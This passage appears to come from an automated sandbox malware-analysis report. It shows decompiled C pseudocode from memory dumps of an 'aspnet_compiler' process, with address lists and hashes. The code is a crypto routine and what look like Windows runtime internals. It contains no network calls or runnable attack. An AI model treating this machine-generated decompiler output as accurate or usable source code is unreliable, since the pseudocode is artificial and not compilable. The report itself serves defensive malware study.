				_t358[3] = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00 | (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t429 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t603 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0x00ff00ff;
				return _t274;
			}



















                                                  0x00402fb0
                                                  0x00402fbf
                                                  0x00402fc8
                                                  0x00402fd6
                                                  0x00402fda
                                                  0x00402fe3
                                                  0x00402ff4
                                                  0x00402ff7
                                                  0x00402ffc
                                                  0x00403005
                                                  0x00403013
                                                  0x00403018
                                                  0x00403021
                                                  0x00403031
                                                  0x00403051
                                                  0x00403054
                                                  0x00403066
                                                  0x0040306b
                                                  0x00403080
                                                  0x0040309d
                                                  0x004030a0
                                                  0x004030b1
                                                  0x004030c6
                                                  0x004030e6
                                                  0x004030e9
                                                  0x004030fb
                                                  0x00403119
                                                  0x00403136
                                                  0x00403139
                                                  0x0040314b
                                                  0x00403160
                                                  0x00403166
                                                  0x0040316e
                                                  0x0040316f
                                                  0x00403172
                                                  0x00403180
                                                  0x00403190
                                                  0x004031a2
                                                  0x004031b4
                                                  0x004031d0
                                                  0x004031e3
                                                  0x004031f0
                                                  0x00403201
                                                  0x00403218
                                                  0x0040323a
                                                  0x0040323d
                                                  0x0040324e
                                                  0x00403269
                                                  0x00403280
                                                  0x00403283
                                                  0x00403295
                                                  0x0040329d
                                                  0x004032b2
                                                  0x004032cf
                                                  0x004032d2
                                                  0x004032e3
                                                  0x00403307
                                                  0x00403317
                                                  0x0040331a
                                                  0x0040332c
                                                  0x00403344
                                                  0x00403347
                                                  0x0040335a
                                                  0x00403367
                                                  0x00403379
                                                  0x00403391
                                                  0x004033b4
                                                  0x004033b7
                                                  0x004033c9
                                                  0x004033de
                                                  0x004033e4
                                                  0x004033e4
                                                  0x004033e7
                                                  0x004033e7
                                                  0x00403180
                                                  0x0040344b
                                                  0x00403454
                                                  0x00403462
                                                  0x004034c0
                                                  0x004034c9
                                                  0x004034d7
                                                  0x00403539
                                                  0x00403542
                                                  0x0040354f
                                                  0x00403552
                                                  0x0040359e
                                                  0x004035aa
                                                  0x004035b3
                                                  0x004035c0
                                                  0x004035c7

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.341848182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_400000_aspnet_compiler.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                  • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                  • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                  • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 018B20A0 Relevance: .4, Instructions: 420COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E018B20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1978714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = L018B2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = L018B2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E018858EC(_t240);
									_t221 =  *0x1975cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1975cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E018C4A2C(0x1976e40, 0x18c4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = L018A7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1865c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = L018BF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = L018BF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01907016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L018A2400(_t267 + 0x20);
															}
															L018A2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E018B2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E018A2280(_t134, 0x1978608);
									__eflags =  *0x1976e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										L0189FFB0(_t198, _t241, 0x1978608);
										__eflags = _t253;
										if(_t253 != 0) {
											L018A77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1976e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1978608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E018B6B90(_t210,  &_v64);
										_t262 =  *0x1978608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E018BE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										L018C97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E018C006A(0x1978608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1978608);
												E018CB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1976904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1976e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								L0189FFB0(_t198, _t240, 0x1978608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E018C00C2(0x1978608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                                                  0x018b20a0
                                                  0x018b20a8
                                                  0x018b20ad
                                                  0x018b20b3
                                                  0x018b20b8
                                                  0x018b20c2
                                                  0x018b20c7
                                                  0x018b20cb
                                                  0x018b20d2
                                                  0x018b2263
                                                  0x018b2266
                                                  0x018f5836
                                                  0x018f5836
                                                  0x00000000
                                                  0x018b226c
                                                  0x018b226c
                                                  0x018b2270
                                                  0x018b2274
                                                  0x018b20e2
                                                  0x018b20e2
                                                  0x018b20e6
                                                  0x018b20ee
                                                  0x018f57dc
                                                  0x018f57de
                                                  0x018f57ec
                                                  0x018f57ec
                                                  0x018f57f1
                                                  0x018f57f3
                                                  0x018f57f8
                                                  0x00000000
                                                  0x018f57f8
                                                  0x018f57e0
                                                  0x018f57e4
                                                  0x018f57ea
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018f57ea
                                                  0x018b20f4
                                                  0x018b20f4
                                                  0x018b20f8
                                                  0x018b20f8
                                                  0x018b20fc
                                                  0x018b2100
                                                  0x018b2106
                                                  0x018b2201
                                                  0x018b2206
                                                  0x018b220b
                                                  0x018b220e
                                                  0x018b22a9
                                                  0x018b22ac
                                                  0x00000000
                                                  0x00000000
                                                  0x018b22b2
                                                  0x018b22b5
                                                  0x018f5801
                                                  0x018f5806
                                                  0x00000000
                                                  0x00000000
                                                  0x018f5810
                                                  0x018f5815
                                                  0x018f5818
                                                  0x00000000
                                                  0x00000000
                                                  0x018f581e
                                                  0x018b22bb
                                                  0x018b22bb
                                                  0x018b2218
                                                  0x018b2218
                                                  0x018b221c
                                                  0x018b2220
                                                  0x018b2222
                                                  0x018b22c2
                                                  0x018b22c4
                                                  0x018b22dc
                                                  0x018b22dc
                                                  0x018b22e1
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018b22e7
                                                  0x018b22c8
                                                  0x018b22cd
                                                  0x018b22d3
                                                  0x018b22d6
                                                  0x018f5823
                                                  0x018f5825
                                                  0x018f5827
                                                  0x00000000
                                                  0x00000000
                                                  0x018f582d
                                                  0x00000000
                                                  0x018f582d
                                                  0x00000000
                                                  0x018b2228
                                                  0x018b2228
                                                  0x00000000
                                                  0x018b2228
                                                  0x018b2222
                                                  0x018b2214
                                                  0x018b2214
                                                  0x00000000
                                                  0x018b2114
                                                  0x018b2114
                                                  0x018b2114
                                                  0x018b211a
                                                  0x018b211c
                                                  0x018b2348
                                                  0x018b234d
                                                  0x018f5840
                                                  0x018f5845
                                                  0x018f5848
                                                  0x018f584e
                                                  0x018f584e
                                                  0x018f5848
                                                  0x018b2353
                                                  0x018b2355
                                                  0x018b2388
                                                  0x018b2388
                                                  0x018b2368
                                                  0x018b236a
                                                  0x018b236c
                                                  0x018b238f
                                                  0x00000000
                                                  0x018b236e
                                                  0x018b236e
                                                  0x018b218e
                                                  0x018b218e
                                                  0x018b2191
                                                  0x018b2195
                                                  0x018f5a03
                                                  0x018f5a06
                                                  0x018f5a0c
                                                  0x018f5a0f
                                                  0x018f5a11
                                                  0x018f5a13
                                                  0x018f5a13
                                                  0x018f5a19
                                                  0x018f5a1f
                                                  0x00000000
                                                  0x018b219b
                                                  0x018b219b
                                                  0x018b21a0
                                                  0x018b2282
                                                  0x018b2284
                                                  0x018b2284
                                                  0x018b2284
                                                  0x018b2284
                                                  0x018b21a6
                                                  0x018b21a9
                                                  0x018b21ac
                                                  0x018b21ae
                                                  0x018b21b3
                                                  0x018b228b
                                                  0x018b2290
                                                  0x018b2379
                                                  0x018b2296
                                                  0x018b2298
                                                  0x018b2298
                                                  0x018b2290
                                                  0x018b21b9
                                                  0x018b21be
                                                  0x018b22a2
                                                  0x018b22a2
                                                  0x018b21c4
                                                  0x018b21c8
                                                  0x018b21cc
                                                  0x018b21d0
                                                  0x018b21d4
                                                  0x018b21de
                                                  0x018b21e3
                                                  0x018f5a29
                                                  0x018f5a2c
                                                  0x00000000
                                                  0x00000000
                                                  0x018f5a3b
                                                  0x00000000
                                                  0x018b21e9
                                                  0x018b21e9
                                                  0x018b21e9
                                                  0x018b21ee
                                                  0x018b21f1
                                                  0x018f5a45
                                                  0x018f5a4b
                                                  0x018f5a52
                                                  0x018f5a58
                                                  0x018f5a5d
                                                  0x018f5a5f
                                                  0x018f5a71
                                                  0x018f5a61
                                                  0x018f5a6a
                                                  0x018f5a6a
                                                  0x018f5a76
                                                  0x018f5a79
                                                  0x018f5a7f
                                                  0x018f5a83
                                                  0x018f5a85
                                                  0x018f5a87
                                                  0x018f5a87
                                                  0x018f5a8c
                                                  0x018f5a91
                                                  0x018f5a97
                                                  0x018f5a9f
                                                  0x018f5aa0
                                                  0x018f5aa1
                                                  0x018f5aa6
                                                  0x018f5aab
                                                  0x018f5ab1
                                                  0x018f5ab3
                                                  0x018f5ab9
                                                  0x018f5aca
                                                  0x018f5ad4
                                                  0x018f5ad4
                                                  0x018f5ade
                                                  0x018f5ade
                                                  0x018f5aab
                                                  0x018f5a79
                                                  0x018f5a52
                                                  0x018b21f7
                                                  0x018b21f9
                                                  0x018b21fe
                                                  0x018b21fe
                                                  0x018b21e3
                                                  0x018b2195
                                                  0x018b236c
                                                  0x018b2122
                                                  0x018b2122
                                                  0x018b2124
                                                  0x018b2231
                                                  0x018b2236
                                                  0x018b2236
                                                  0x018b2238
                                                  0x018b2238
                                                  0x018b2240
                                                  0x018b2242
                                                  0x018b2244
                                                  0x018f59fc
                                                  0x018b218c
                                                  0x018b218c
                                                  0x00000000
                                                  0x018b218c
                                                  0x018b224a
                                                  0x018b224f
                                                  0x018b2256
                                                  0x018b2304
                                                  0x018b2309
                                                  0x018b230f
                                                  0x018b231e
                                                  0x018b231e
                                                  0x018b231e
                                                  0x018b2320
                                                  0x018b2325
                                                  0x018b232a
                                                  0x018b232c
                                                  0x018b233e
                                                  0x018b233e
                                                  0x00000000
                                                  0x018b232c
                                                  0x018b2311
                                                  0x018b2317
                                                  0x018b231a
                                                  0x018b231c
                                                  0x018b2380
                                                  0x018b2380
                                                  0x018b2380
                                                  0x018b2384
                                                  0x00000000
                                                  0x00000000
                                                  0x018b2386
                                                  0x00000000
                                                  0x018b231c
                                                  0x018b225c
                                                  0x018b225c
                                                  0x00000000
                                                  0x018b225c
                                                  0x018b212a
                                                  0x018b2134
                                                  0x018b2138
                                                  0x018b213d
                                                  0x018f5858
                                                  0x018f5863
                                                  0x018f5863
                                                  0x018f5867
                                                  0x018f586a
                                                  0x00000000
                                                  0x00000000
                                                  0x018f586c
                                                  0x018f586c
                                                  0x018f5871
                                                  0x018f5875
                                                  0x018f5877
                                                  0x018f5997
                                                  0x018f599c
                                                  0x018f59a1
                                                  0x018f59a7
                                                  0x018f59a7
                                                  0x00000000
                                                  0x018f59a7
                                                  0x018f587d
                                                  0x00000000
                                                  0x018f588b
                                                  0x018f588b
                                                  0x018f5890
                                                  0x018f5892
                                                  0x018f5894
                                                  0x018f5899
                                                  0x018f589b
                                                  0x018f58a0
                                                  0x018f58a0
                                                  0x018f58aa
                                                  0x018f58b2
                                                  0x018f58b6
                                                  0x018f58be
                                                  0x018f58c6
                                                  0x018f58c9
                                                  0x018f590d
                                                  0x018f5917
                                                  0x018f591a
                                                  0x018f591c
                                                  0x018f5920
                                                  0x018f5928
                                                  0x018f592a
                                                  0x018f592c
                                                  0x018f592e
                                                  0x018f592e
                                                  0x018f58cb
                                                  0x018f58cd
                                                  0x018f58d8
                                                  0x018f58e0
                                                  0x018f58f4
                                                  0x018f58fe
                                                  0x018f58fe
                                                  0x018f593a
                                                  0x018f593e
                                                  0x018f5940
                                                  0x018f5942
                                                  0x00000000
                                                  0x018f5944
                                                  0x018f5944
                                                  0x018f5949
                                                  0x018f594e
                                                  0x018f594e
                                                  0x018f5953
                                                  0x018f595b
                                                  0x018f5976
                                                  0x018f5976
                                                  0x018f597a
                                                  0x018f597f
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018f5981
                                                  0x018f5981
                                                  0x018f5981
                                                  0x018f5983
                                                  0x018f5988
                                                  0x018f598d
                                                  0x018f5991
                                                  0x018f5991
                                                  0x00000000
                                                  0x018f595d
                                                  0x018f595d
                                                  0x018f5963
                                                  0x018f5965
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018f5967
                                                  0x018f5967
                                                  0x018f596b
                                                  0x018f596d
                                                  0x00000000
                                                  0x00000000
                                                  0x018f596f
                                                  0x018f5971
                                                  0x018f5971
                                                  0x018f5974
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x018f5974
                                                  0x00000000
                                                  0x018f5967
                                                  0x018f595b
                                                  0x018f5942
                                                  0x018f5863
                                                  0x018b2143
                                                  0x018b2143
                                                  0x018b2149
                                                  0x018b214f
                                                  0x018b22f1
                                                  0x018b22f6
                                                  0x00000000
                                                  0x018b2173
                                                  0x018b2173
                                                  0x018b217d
                                                  0x018b2181
                                                  0x018b2186
                                                  0x018f59ae
                                                  0x018f59b2
                                                  0x018f59b5
                                                  0x018f59b7
                                                  0x018f59ba
                                                  0x018f59cd
                                                  0x018f59d1
                                                  0x018f59d5
                                                  0x018f59d9
                                                  0x018f59db
                                                  0x00000000
                                                  0x00000000
                                                  0x018f59dd
                                                  0x018f59dd
                                                  0x018f59e1
                                                  0x018f59e4
                                                  0x018f59e7
                                                  0x018f59ee
                                                  0x018f59ee
                                                  0x018f59f3
                                                  0x018f59f3
                                                  0x00000000
                                                  0x018b2186
                                                  0x018b214f
                                                  0x018b2106
                                                  0x018b2266
                                                  0x018b20d8
                                                  0x018b20da
                                                  0x018b20e0
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000

                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.342566567.0000000001860000.00000040.00000800.00020000.00000000.sdmp, Offset: 01860000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_1860000_aspnet_compiler.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 26ec6580d675e3e3a3ec90b8916d1c2605be0313d53d1f2229997f5235d75956
                                                  • Instruction ID: 5b92263433cb6a6ae9d8e5fb16a0f9b46050c0ff98841f2c4d6ac94899700eb9
                                                  • Opcode Fuzzy Hash: 26ec6580d675e3e3a3ec90b8916d1c2605be0313d53d1f2229997f5235d75956
                                                  • Instruction Fuzzy Hash: A7F109316087419FE726CF2CC4807ABBBE6AF85714F04851DEA99DB391D734EA41CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0189B090 Relevance: .4, Instructions: 405COMMONCrypto
                                                  Download Yara Rule
                                                  C-Code - Quality: 99%
                                                  			E0189B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _t117;
				signed int _t119;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t134;
				signed int _t139;
				signed char _t143;
				signed int _t144;
				signed int _t146;
				signed int _t148;
				signed int* _t150;
				signed int _t152;
				signed int _t161;
				signed char _t165;
				signed int _t167;
				signed int _t170;
				signed int _t174;
				signed char _t177;
				signed int _t178;
				signed int _t181;
				signed int _t182;
				signed int _t187;
				signed int _t190;
				signed int _t192;
				signed int _t194;
				signed int _t196;
				signed int _t199;
				signed int _t202;
				signed int _t208;
				signed int _t211;

				_t182 = _a16;
				_t178 = _a8;
				_t161 = _a4;
				 *_t182 = 0;
				 *(_t182 + 4) = 0;
				_t5 = _t161 + 4; // 0x4
				_t117 =  *_t5 & 0x00000001;
				if(_t178 == 0) {
					 *_t161 = _t182;
					 *(_t161 + 4) = _t182;
					if(_t117 != 0) {
						_t117 = _t182 | 0x00000001;
						 *(_t161 + 4) = _t117;
					}
					 *(_t182 + 8) = 0;
					goto L43;
				} else {
					_t208 = _t182 ^ _t178;
					_t192 = _t208;
					if(_t117 == 0) {
						_t192 = _t182;
					}
					_t117 = _a12 & 0x000000ff;
					 *(_t178 + _t117 * 4) = _t192;
					if(( *(_t161 + 4) & 0x00000001) == 0) {
						_t208 = _t178;
					}
					 *(_t182 + 8) = _t208 | 0x00000001;
					if(_a12 == 0) {
						_t14 = _t161 + 4; // 0x4
						_t177 =  *_t14;
						_t117 = _t177 & 0xfffffffe;
						if(_t178 == _t117) {
							_t117 = _a4;
							 *(_t117 + 4) = _t182;
							if((_t177 & 0x00000001) != 0) {
								_t161 = _a4;
								_t117 = _t182 | 0x00000001;
								 *(_t161 + 4) = _t117;
							} else {
								_t161 = _t117;
							}
						} else {
							_t161 = _a4;
						}
					}
					if(( *(_t178 + 8) & 0x00000001) == 0) {
						L42:
						L43:
						return _t117;
					} else {
						_t19 = _t161 + 4; // 0x4
						_t165 =  *_t19 & 0x00000001;
						do {
							_t211 =  *(_t178 + 8) & 0xfffffffc;
							if(_t165 != 0) {
								if(_t211 != 0) {
									_t211 = _t211 ^ _t178;
								}
							}
							_t119 =  *_t211;
							if(_t165 != 0) {
								if(_t119 != 0) {
									_t119 = _t119 ^ _t211;
								}
							}
							_t120 = 0;
							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
							_v8 = _t121;
							_t122 = _t121 ^ 0x00000001;
							_v16 = _t122;
							_t123 =  *(_t211 + _t122 * 4);
							if(_t165 != 0) {
								if(_t123 == 0) {
									goto L20;
								}
								_t123 = _t123 ^ _t211;
								goto L13;
							} else {
								L13:
								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
									L20:
									_t194 = _v16;
									if((_a12 & 0x000000ff) != _v8) {
										_t126 =  *(_t182 + 8) & 0xfffffffc;
										_t167 = _t165 & 1;
										_v12 = _t167;
										if(_t167 != 0) {
											if(_t126 != 0) {
												_t126 = _t126 ^ _t182;
											}
										}
										if(_t126 != _t178) {
											L83:
											_t178 = 0x1d;
											asm("int 0x29");
											goto L84;
										} else {
											_t126 =  *(_t178 + _t194 * 4);
											if(_t167 != 0) {
												if(_t126 != 0) {
